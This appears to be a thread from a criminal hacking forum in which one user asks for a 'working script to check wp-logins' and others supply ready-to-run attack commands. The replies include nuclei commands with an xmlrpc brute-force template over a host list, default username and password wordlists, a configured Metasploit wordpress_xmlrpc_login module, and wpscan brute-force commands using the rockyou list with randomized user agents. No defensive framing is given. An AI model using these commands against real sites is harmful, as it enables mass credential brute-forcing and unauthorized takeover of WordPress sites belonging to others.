Looking for WordPress checker.

[Smokiez]

Hello, xss.

I am looking for working script to check wp-logins.

 

[Prokhorenco]

You can use nuclei to do this with their xmlrpc brute-force template:

nuclei -l hosts.txt -t nuclei-templates/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml -o wp-logins.txt

wp-users.txt

user@host:~/nuclei-templates/helpers/wordlists# cat wp-users.txt
adm
admin
user
admin1
hostname
manager
qwerty
root
support
sysadmin
test

wp-passwords.txt

user@host:~/nuclei-templates/helpers/wordlists# cat wp-passwords.txt
admin
123456
password
12345678
666666
111111
1234567
qwerty
siteadmin
administrator
root
123123
123321
1234567890
letmein123
test123
demo123
pass123
123qwe
qwe123
654321
loveyou
adminadmin123

 

[Prokhorenco]

You can use nuclei to do this with their xmlrpc brute-force template:

nuclei -l hosts.txt -t nuclei-templates/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml -o wp-logins.txt

wp-users.txt

wp-passwords.txt

Another way to do it is by using metasploit:

msfconsole
msf6 > use auxiliary/scanner/http/wordpress_xmlrpc_login
set RHOSTS file:/home/user/hosts.txt
set RPORT 443
set SSL true
set USER_FILE file:/home/user/users.txt
set PASS_FILE file:/home/user/passwords.txt
set THREADS 10
run

 

[Nick Diesel]

Hello, xss.

I am looking for working script to check wp-logins.

wpscan --url https://<YOUR_URL> --enumerate vt,vp,cb --random-user-agent --api-token <YOUR_API>
wpscan --url https://<YOUR_URL> -U <User> -P /path/to/dir/with/you/SecLists/Passwords/Leaked-Databases/rockyou-75.txt --random-user-agent --api-token <YOUR_API> --force